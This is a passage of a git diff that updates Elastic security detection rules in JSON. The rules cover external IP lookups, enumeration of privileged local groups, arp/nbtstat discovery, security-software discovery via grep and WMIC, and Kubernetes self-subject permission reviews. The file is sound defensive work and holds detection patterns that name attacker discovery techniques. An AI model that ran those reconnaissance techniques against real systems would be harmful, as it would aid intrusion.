and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating External IP Lookup from Non-Browser Process\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for connections to known IP lookup services through non-browser processes or non-installed programs.\nUsing only the IP address of the compromised system, attackers can obtain valuable information such as the system's\ngeographic location, the company that owns the IP, whether the system is cloud-hosted, and more.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file\nmodifications, and any spawned child processes.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Use the data collected through the analysis to investigate other machines affected in the environment.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "network where network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-19\", \"S-1-5-20\") and\n event.action == \"lookup_requested\" and\n /* Add new external IP lookup services here */\n dns.question.name :\n (\n \"*api.ipify.org\",\n \"*freegeoip.app\",\n \"*checkip.amazonaws.com\",\n \"*checkip.dyndns.org\",\n \"*freegeoip.app\",\n \"*icanhazip.com\",\n \"*ifconfig.*\",\n \"*ipecho.net\",\n \"*ipgeoapi.com\",\n \"*ipinfo.io\",\n \"*ip.anysrc.net\",\n \"*myexternalip.com\",\n \"*myipaddress.com\",\n \"*showipaddress.com\",\n \"*whatismyipaddress.com\",\n \"*wtfismyip.com\",\n \"*ipapi.co\",\n \"*ip-lookup.net\",\n \"*ipstack.com\"\n ) and\n /* Insert noisy false positives here */\n not process.executable :\n (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\"\n )\n", "references": [ "https://community.jisc.ac.uk/blogs/csirt/article/trickbot-analysis-and-mitigation", "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware" ], + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "1d72d014-e2ab-4707-b056-9b96abe7b511", "severity": "low", @@ -60,5 +92,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 8 + "version": 10 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_privileged_localgroup_membership.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_privileged_localgroup_membership.json index 9772cdf9f1ada..98ee661f936b1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_privileged_localgroup_membership.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_privileged_localgroup_membership.json @@ -11,10 +11,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Enumeration of Privileged Local Groups Membership", - "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known\nlegitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack,\nsuch as mapping targets for credential compromise and other post-exploitation activities.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n- Retrieve the process executable and determine if it is malicious:\n - Check if the file belongs to the operating system or has a valid digital signature.\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nAudit Policies > \nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "iam where event.action == \"user-member-enumerated\" and\n\n /* noisy and usual legit processes excluded */\n not winlog.event_data.CallerProcessName:\n (\"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchIndexer.exe\",\n \"?:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\n \"?:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe\",\n \"?:\\\\Windows\\\\System32\\\\net1.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\Netplwiz.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\CloudExperienceHostBroker.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\SrTasks.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\diskshadow.exe\",\n \"?:\\\\Windows\\\\System32\\\\dfsrs.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\") and\n /* privileged local groups */\n (group.name:(\"admin*\",\"RemoteDesktopUsers\") or\n winlog.event_data.TargetSid:(\"S-1-5-32-544\",\"S-1-5-32-555\"))\n", + "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known\nlegitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack,\nsuch as mapping targets for credential compromise and other post-exploitation activities.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n- Retrieve the process executable and determine if it is malicious:\n - Check if the file belongs to the operating system or has a valid digital signature.\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "query": "iam where event.action == \"user-member-enumerated\" and\n\n /* excluding machine account */\n not winlog.event_data.SubjectUserName: (\"*$\", \"LOCAL SERVICE\", \"NETWORK SERVICE\") and\n\n /* noisy and usual legit processes excluded */\n not winlog.event_data.CallerProcessName:\n (\"-\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchIndexer.exe\",\n \"?:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\n \"?:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe\",\n \"?:\\\\Windows\\\\System32\\\\net1.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\Netplwiz.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\CloudExperienceHostBroker.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\SrTasks.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\diskshadow.exe\",\n \"?:\\\\Windows\\\\System32\\\\dfsrs.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\WindowsAzure\\\\*\\\\WaAppAgent.exe\",\n \"?:\\\\Windows\\\\System32\\\\vssadmin.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\SettingSyncHost.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe\",\n \"?:\\\\Windows\\\\System32\\\\SystemSettingsAdminFlows.exe\",\n \"?:\\\\Windows\\\\Temp\\\\rubrik_vmware???\\\\snaptool.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\wsmprovhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\x3jobt3?.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\esentutl.exe\",\n \"?:\\\\Windows\\\\System32\\\\RecoveryDrive.exe\",\n \"?:\\\\Windows\\\\System32\\\\SystemPropertiesComputerName.exe\") and\n\n /* privileged local groups */\n (group.name:(\"admin*\",\"RemoteDesktopUsers\") or\n winlog.event_data.TargetSid:(\"S-1-5-32-544\",\"S-1-5-32-555\"))\n", + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "group.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallerProcessName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetSid", + "type": "unknown" + } + ], "risk_score": 43, "rule_id": "291a0de9-937a-4189-94c0-3e847c8b13e4", + "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +77,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_remote_system_discovery_commands_windows.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_remote_system_discovery_commands_windows.json index d31c55737fb03..ae5414ab2bd6f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_remote_system_discovery_commands_windows.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_remote_system_discovery_commands_windows.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote System Discovery Commands", - "note": "## Triage and analysis\n\n### Investigating Remote System Discovery Commands\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `arp` or `nbstat` utilities to enumerate remote systems in the environment,\nwhich is useful for attackers to identify lateral movement targets.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Remote System Discovery Commands\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `arp` or `nbstat` utilities to enumerate remote systems in the environment,\nwhich is useful for attackers to identify lateral movement targets.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n ((process.name : \"nbtstat.exe\" and process.args : (\"-n\", \"-s\")) or\n (process.name : \"arp.exe\" and process.args : \"-a\"))\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "0635c542-1b96-4335-9b47-126582d2c19a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -48,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_security_software_grep.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_security_software_grep.json index 903fb701e1dee..5712c0ea676da 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_security_software_grep.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_security_software_grep.json @@ -14,10 +14,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Security Software Discovery via Grep", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\nprocess.name : \"grep\" and user.id != \"0\" and\n not process.parent.executable : \"/Library/Application Support/*\" and\n process.args :\n (\"Little Snitch*\",\n \"Avast*\",\n \"Avira*\",\n \"ESET*\",\n \"BlockBlock*\",\n \"360Sec*\",\n \"LuLu*\",\n \"KnockKnock*\",\n \"kav\",\n \"KIS\",\n \"RTProtectionDaemon*\",\n \"Malware*\",\n \"VShieldScanner*\",\n \"WebProtection*\",\n \"webinspectord*\",\n \"McAfee*\",\n \"isecespd*\",\n \"macmnsvc*\",\n \"masvc*\",\n \"kesl*\",\n \"avscan*\",\n \"guard*\",\n \"rtvscand*\",\n \"symcfgd*\",\n \"scmdaemon*\",\n \"symantec*\",\n \"sophos*\",\n \"osquery*\",\n \"elastic-endpoint*\"\n ) and\n not (process.args : \"Avast\" and process.args : \"Passwords\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "870aecc0-cea4-4110-af3f-e02e9b373655", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -53,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_security_software_wmic.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_security_software_wmic.json index ebf7a44a5fdcc..77c39d02f260d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_security_software_wmic.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_security_software_wmic.json @@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Security Software Discovery using WMIC", - "note": "## Triage and analysis\n\n### Investigating Security Software Discovery using WMIC\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `wmic` utility with arguments compatible to the enumeration of the security\nsoftware installed on the host. Attackers can use this information to decide whether or not to infect a system, disable\nprotections, use bypasses, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Security Software Discovery using WMIC\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `wmic` utility with arguments compatible to the enumeration of the security\nsoftware installed on the host. Attackers can use this information to decide whether or not to infect a system, disable\nprotections, use bypasses, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name:\"wmic.exe\" or process.pe.original_file_name:\"wmic.exe\") and\n process.args:\"/namespace:\\\\\\\\root\\\\SecurityCenter2\" and process.args:\"Get\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "6ea55c81-e2ba-42f2-a134-bccf857ba922", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_suspicious_self_subject_review.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_suspicious_self_subject_review.json new file mode 100644 index 0000000000000..b001aea3b04fe --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_suspicious_self_subject_review.json @@ -0,0 +1,74 @@ +{ + "author": [ + "Elastic" + ], + "description": "This rule detects when a service account or node attempts to enumerate their own permissions via the selfsubjectaccessreview or selfsubjectrulesreview APIs. This is highly unusual behavior for non-human identities like service accounts and nodes. An adversary may have gained access to credentials/tokens and this could be an attempt to determine what privileges they have to facilitate further movement or execution within the cluster.", + "false_positives": [ + "An administrator may submit this request as an \"impersonatedUser\" to determine what privileges a particular service account has been granted. However, an adversary may utilize the same technique as a means to determine the privileges of another token other than that of the compromised account." + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Suspicious Self-Subject Review", + "note": "", + "query": "kubernetes.audit.verb:\"create\" \nand kubernetes.audit.objectRef.resource:(\"selfsubjectaccessreviews\" or \"selfsubjectrulesreviews\") \nand kubernetes.audit.user.username:(system\\:serviceaccount\\:* or system\\:node\\:*) or kubernetes.audit.impersonatedUser.username:(system\\:serviceaccount\\:* or system\\:node\\:*)\n", + "references": [ + "https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/kubernetes-privilege-escalation-excessive-permissions-in-popular-platforms", + "https://kubernetes.io/docs/reference/access-authn-authz/authorization/#checking-api-access", + "https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/detecting-identity-attacks-in-kubernetes/ba-p/3232340" + ], + "required_fields": [ + { + "ecs": false, + "name": "kubernetes.audit.impersonatedUser.username", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.user.username", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "12a2f15d-597e-4334-88ff-38a02cb1330b", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Kubernetes", + 